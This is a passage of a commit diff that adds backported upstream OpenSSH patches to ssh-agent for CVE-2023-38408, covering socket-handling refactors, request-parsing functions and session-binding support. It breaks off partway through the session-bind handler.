+diff --git a/ssh-agent.c b/ssh-agent.c
+index 1794f35..78f7268 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -853,8 +853,10 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
+-/* dispatch incoming messages */
+-
++/*
++ * dispatch incoming message.
++ * returns 1 on success, 0 for incomplete messages or -1 on error.
++ */
+ static int
+ process_message(u_int socknum)
+ {
+@@ -908,7 +910,7 @@ process_message(u_int socknum)
+ /* send a fail message for all other request types */
+ send_status(e, 0);
+ }
+- return 0;
++ return 1;
+ }
+
+ switch (type) {
+@@ -952,7 +954,7 @@ process_message(u_int socknum)
+ send_status(e, 0);
+ break;
+ }
+- return 0;
++ return 1;
+ }
+
+ static void
+@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
+ if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ explicit_bzero(buf, sizeof(buf));
+- process_message(socknum);
++ for (;;) {
++ if ((r = process_message(socknum)) == -1)
++ return -1;
++ else if (r == 0)
++ break;
++ }
+ return 0;
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
+From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:47:47 +0000
+Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
+ sockets table;
+
+also clear socket entries that are being marked as unused.
+
+spinkle in some debug2() spam to make it easier to watch an agent
+do its thing.
+
+ok markus
+
+OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 20 ++++++++++++++++----
+ 1 file changed, 16 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 78f7268..2635bc5 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -175,11 +175,12 @@ static void
+ close_socket(SocketEntry *e)
+ {
+ close(e->fd);
+- e->fd = -1;
+- e->type = AUTH_UNUSED;
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ memset(e, '\0', sizeof(*e));
++ e->fd = -1;
++ e->type = AUTH_UNUSED;
+ }
+
+ static void
+@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
+ struct sshbuf *msg;
+ int r;
+
++ debug2("%s: entering", __func__);
++
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
+@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
+ struct sshkey *key = NULL;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0) {
+ error("%s: get key: %s", __func__, ssh_err(r));
+ goto done;
+@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
+ {
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ /* Loop over all identities and clear the keys. */
+ for (id = TAILQ_FIRST(&idtab->idlist); id;
+ id = TAILQ_FIRST(&idtab->idlist)) {
+@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
+ u_char ctype;
+ int r = SSH_ERR_INTERNAL_ERROR;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
+ k == NULL ||
+ (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
+@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
+ static u_int fail_count = 0;
+ size_t pwlen;
+
++ debug2("%s: entering", __func__);
+ /*
+ * This is deliberately fatal: the user has requested that we lock,
+ * but we can't parse their request properly. The only safe thing to
+@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
+ struct sshkey **keys = NULL, *k;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
+ int r, success = 0;
+ Identity *id, *nxt;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
+ {
+ u_int i, old_alloc, new_alloc;
+
++ debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
++ (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
+ set_nonblock(fd);
+
+ if (fd > max_fd)
+@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
+ }
+ old_alloc = sockets_alloc;
+ new_alloc = sockets_alloc + 10;
+- sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
++ sockets = xrecallocarray(sockets, old_alloc, new_alloc,
++ sizeof(sockets[0]));
+ for (i = old_alloc; i < new_alloc; i++)
+ sockets[i].type = AUTH_UNUSED;
+ sockets_alloc = new_alloc;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
+From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:53:31 +0000
+Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
+
+Allow confirm_key() to accept an additional reason suffix
+
+Factor publickey userauth parsing out into its own function and allow
+it to optionally return things it parsed out of the message to its
+caller.
+
+feedback/ok markus@
+
+OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
+ 1 file changed, 130 insertions(+), 67 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 2635bc5..7ad323c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
+
+ /* Check confirmation of keysign request */
+ static int
+-confirm_key(Identity *id)
++confirm_key(Identity *id, const char *extra)
+ {
+ char *p;
+ int ret = -1;
+
+ p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
+ if (p != NULL &&
+- ask_permission("Allow use of key %s?\nKey fingerprint %s.",
+- id->comment, p))
++ ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
++ id->comment, p,
++ extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
+ ret = 0;
+ free(p);
+
+@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ }
+
+ /*
+- * This function inspects a message to be signed by a FIDO key that has a
+- * web-like application string (i.e. one that does not begin with "ssh:".
+- * It checks that the message is one of those expected for SSH operations
+- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
+- * for the web.
++ * Attempt to parse the contents of a buffer as a SSH publickey userauth
++ * request, checking its contents for consistency and matching the embedded
++ * key against the one that is being used for signing.
++ * Note: does not modify msg buffer.
++ * Optionally extract the username and session ID from the request.
+ */
+ static int
+-check_websafe_message_contents(struct sshkey *key,
+- const u_char *msg, size_t len)
++parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
++ char **userp, struct sshbuf **sess_idp)
+ {
+- int matched = 0;
+- struct sshbuf *b;
+- u_char m, n;
+- char *cp1 = NULL, *cp2 = NULL;
++ struct sshbuf *b = NULL, *sess_id = NULL;
++ char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
+ int r;
++ u_char t, sig_follows;
+ struct sshkey *mkey = NULL;
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
++ if (userp != NULL)
++ *userp = NULL;
++ if (sess_idp != NULL)
++ *sess_idp = NULL;
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
+
+ /* SSH userauth request */
+- if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
+- (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
+- (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
+- (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
+- (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
+- (r = sshkey_froms(b, &mkey)) == 0 && /* key */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed userauth", __func__);
+- if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
+- strcmp(cp1, "ssh-connection") == 0 &&
+- strcmp(cp2, "publickey") == 0 &&
+- sshkey_equal(key, mkey)) {
+- debug("%s: well formed userauth", __func__);
+- matched = 1;
+- }
++ if ((r = sshbuf_froms(b, &sess_id)) != 0)
++ goto out;
++ if (sshbuf_len(sess_id) == 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
+ }
+- free(cp1);
+- free(cp2);
+- sshkey_free(mkey);
++ if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
++ (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
++ (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
++ (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
++ (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
++ (r = sshkey_froms(b, &mkey)) != 0) /* key */
++ goto out;
++ if (t != SSH2_MSG_USERAUTH_REQUEST ||
++ sig_follows != 1 ||
++ strcmp(service, "ssh-connection") != 0 ||
++ !sshkey_equal(expected_key, mkey) ||
++ sshkey_type_from_name(pkalg) != expected_key->type) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (strcmp(method, "publickey") != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ debug("%s: well formed userauth", __func__);
++ if (userp != NULL) {
++ *userp = user;
++ user = NULL;
++ }
++ if (sess_idp != NULL) {
++ *sess_idp = sess_id;
++ sess_id = NULL;
++ }
++ out:
+ sshbuf_free(b);
+- if (matched)
+- return 1;
++ sshbuf_free(sess_id);
++ free(user);
++ free(service);
++ free(method);
++ free(pkalg);
++ sshkey_free(mkey);
++ return r;
++}
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
+- cp1 = cp2 = NULL;
+- mkey = NULL;
+-
+- /* SSHSIG */
+- if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
+- (r = sshbuf_consume(b, 6)) == 0 &&
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed sshsig", __func__);
+- matched = 1;
+- }
++/*
++ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
++ * Note: does not modify buffer.
++ */
++static int
++parse_sshsig_request(struct sshbuf *msg)
++{
++ int r;
++ struct sshbuf *b;
+
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
++
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
++ (r = sshbuf_consume(b, 6)) != 0 ||
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
++ goto out;
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ out:
+ sshbuf_free(b);
+- if (matched)
++ return r;
++}
++
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
++{
++ if (parse_userauth_request(data, key, NULL, NULL) == 0) {
++ debug("%s: signed data matches public key userauth request", __func__);
+ return 1;
++ }
++ if (parse_sshsig_request(data) == 0) {
++ debug("%s: signed data matches SSHSIG signature request", __func__);
++ return 1;
++ }
+
+- /* XXX CA signature operation */
++ /* XXX check CA signature operation */
+
+ error("web-origin key attempting to sign non-SSH message");
+ return 0;
+@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
+ static void
+ process_sign_request2(SocketEntry *e)
+ {
+- const u_char *data;
+ u_char *signature = NULL;
+- size_t dlen, slen = 0;
++ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+ char *fp = NULL;
+- struct sshbuf *msg;
++ struct sshbuf *msg = NULL, *data = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+
+- if ((msg = sshbuf_new()) == NULL)
++ debug("%s: entering", __func__);
++
++ if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0 ||
+- (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
++ (r = sshbuf_get_stringb(e->request, data)) != 0 ||
+ (r = sshbuf_get_u32(e->request, &flags)) != 0) {
+ error("%s: couldn't parse request: %s", __func__, ssh_err(r));
+ goto send;
+@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id) != 0) {
++ if (id->confirm && confirm_key(id, NULL) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+ if (sshkey_is_sk(id->key)) {
+ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
+- !check_websafe_message_contents(key, data, dlen)) {
++ !check_websafe_message_contents(key, data)) {
+ /* error already logged */
+ goto send;
+ }
+@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+- data, dlen, agent_decode_alg(key, flags),
++ sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
+ id->sk_provider, compat)) != 0) {
+ error("%s: sshkey_sign: %s", __func__, ssh_err(r));
+ goto send;
+@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
+ ok = 0;
+ send:
+ notify_complete(notifier);
+- sshkey_free(key);
+- free(fp);
++
+ if (ok == 0) {
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
+ (r = sshbuf_put_string(msg, signature, slen)) != 0)
+@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(data);
+ sshbuf_free(msg);
++ sshkey_free(key);
++ free(fp);
+ free(signature);
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
+From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:28:10 +0000
+Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
+ the fuzzer I'm
+
+writing a bit easier
+
+OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7ad323c..c99927c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -108,7 +108,7 @@ typedef enum {
+ AUTH_CONNECTION
+ } sock_type;
+
+-typedef struct {
++typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
+From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:29:46 +0000
+Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
+
+OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index c99927c..7f1e14b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -103,9 +103,9 @@
+ #define AGENT_RBUF_LEN (4096)
+
+ typedef enum {
+- AUTH_UNUSED,
+- AUTH_SOCKET,
+- AUTH_CONNECTION
++ AUTH_UNUSED = 0,
++ AUTH_SOCKET = 1,
++ AUTH_CONNECTION = 2,
+ } sock_type;
+
+ typedef struct socket_entry {
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
new file mode 100644
index 0000000000..c300393ebf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
+From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Sun, 19 Dec 2021 22:09:23 +0000
+Subject: [PATCH 11/12] upstream: ssh-agent side of binding
+
+record session ID/hostkey/forwarding status for each active socket.
+
+Attempt to parse data-to-be-signed at signature request time and extract
+session ID from the blob if it is a pubkey userauth request.
+
+ok markus@
+
+OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ authfd.h | 3 +
+ ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
+ 2 files changed, 170 insertions(+), 8 deletions(-)
+
+diff --git a/authfd.h b/authfd.h
+index c3bf625..9cc9807 100644
+--- a/authfd.h
++++ b/authfd.h
+@@ -76,6 +76,9 @@ int ssh_agent_sign(int sock, const struct sshkey *key,
+ #define SSH2_AGENTC_ADD_ID_CONSTRAINED 25
+ #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
+
++/* generic extension mechanism */
++#define SSH_AGENTC_EXTENSION 27
++
+ #define SSH_AGENT_CONSTRAIN_LIFETIME 1
+ #define SSH_AGENT_CONSTRAIN_CONFIRM 2
+ #define SSH_AGENT_CONSTRAIN_MAXSIGN 3
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7f1e14b..01c7f2b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -98,9 +98,15 @@
+ #endif
+
+ /* Maximum accepted message length */
+-#define AGENT_MAX_LEN (256*1024)
++#define AGENT_MAX_LEN (256*1024)
+ /* Maximum bytes to read from client socket */
+-#define AGENT_RBUF_LEN (4096)
++#define AGENT_RBUF_LEN (4096)
++/* Maximum number of recorded session IDs/hostkeys per connection */
++#define AGENT_MAX_SESSION_IDS 16
++/* Maximum size of session ID */
++#define AGENT_MAX_SID_LEN 128
++
++/* XXX store hostkey_sid in a refcounted tree */
+
+ typedef enum {
+ AUTH_UNUSED = 0,
+@@ -108,12 +114,20 @@ typedef enum {
+ AUTH_CONNECTION = 2,
+ } sock_type;
+
++struct hostkey_sid {
++ struct sshkey *key;
++ struct sshbuf *sid;
++ int forwarded;
++};
++
+ typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+ struct sshbuf *output;
+ struct sshbuf *request;
++ size_t nsession_ids;
++ struct hostkey_sid *session_ids;
+ } SocketEntry;
+
+ u_int sockets_alloc = 0;
+@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
+ static void
+ close_socket(SocketEntry *e)
+ {
++ size_t i;
++
+ close(e->fd);
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ for (i = 0; i < e->nsession_ids; i++) {
++ sshkey_free(e->session_ids[i].key);
++ sshbuf_free(e->session_ids[i].sid);
++ }
++ free(e->session_ids);
+ memset(e, '\0', sizeof(*e));
+ e->fd = -1;
+ e->type = AUTH_UNUSED;
+@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
+ return 0;
+ }
+
++static int
++buf_equal(const struct sshbuf *a, const struct sshbuf *b)
++{
++ if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
++ return SSH_ERR_INVALID_ARGUMENT;
++ if (sshbuf_len(a) != sshbuf_len(b))
++ return SSH_ERR_INVALID_FORMAT;
++ if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
++ return SSH_ERR_INVALID_FORMAT;
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
+ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+- char *fp = NULL;
+- struct sshbuf *msg = NULL, *data = NULL;
++ char *fp = NULL, *user = NULL, *sig_dest = NULL;
++ struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id, NULL) != 0) {
++ /*
++ * If session IDs were recorded for this socket, then use them to
++ * annotate the confirmation messages with the host keys.
++ */
++ if (e->nsession_ids > 0 &&
++ parse_userauth_request(data, key, &user, &sid) == 0) {
++ /*
++ * session ID from userauth request should match the final
++ * ID in the list recorded in the socket, unless the ssh
++ * client at that point lacks the binding extension (or if
++ * an attacker is trying to steal use of the agent).
++ */
++ i = e->nsession_ids - 1;
++ if (buf_equal(sid, e->session_ids[i].sid) == 0) {
++ if ((fp = sshkey_fingerprint(e->session_ids[i].key,
++ SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ debug3("%s: destination %s %s (slot %zu)", __func__,
++ sshkey_type(e->session_ids[i].key), fp, i);
++ xasprintf(&sig_dest, "public key request for "
++ "target user \"%s\" to %s %s", user,
++ sshkey_type(e->session_ids[i].key), fp);
++ free(fp);
++ fp = NULL;
++ }
++ }//
++ if (id->confirm && confirm_key(id, sig_dest) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
+ SSH_FP_DEFAULT)) == NULL)
+ fatal("%s: fingerprint failed", __func__);
+ notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ "Confirm user presence for key %s %s%s%s",
++ sshkey_type(id->key), fp,
++ sig_dest == NULL ? "" : "\n",
++ sig_dest == NULL ? "" : sig_dest);
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(sid);
+ sshbuf_free(data);
+ sshbuf_free(msg);
+ sshkey_free(key);
+ free(fp);
+ free(signature);
++ free(sig_dest);
++ free(user);
+ }
+
+ /* shared */
+@@ -925,6 +989,98 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
++static int
++process_ext_session_bind(SocketEntry *e)
++{
++ int r, sid_match, key_match;
++ struct sshkey *key = NULL;
++ struct sshbuf *sid = NULL, *sig = NULL;
++ char *fp = NULL;
++ u_char fwd;
++ size_t i;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshkey_froms(e->request, &key)) != 0 ||
++ (r = sshbuf_froms(e->request, &sid)) != 0 ||
++ (r = sshbuf_froms(e->request, &sig)) != 0 ||
++ (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
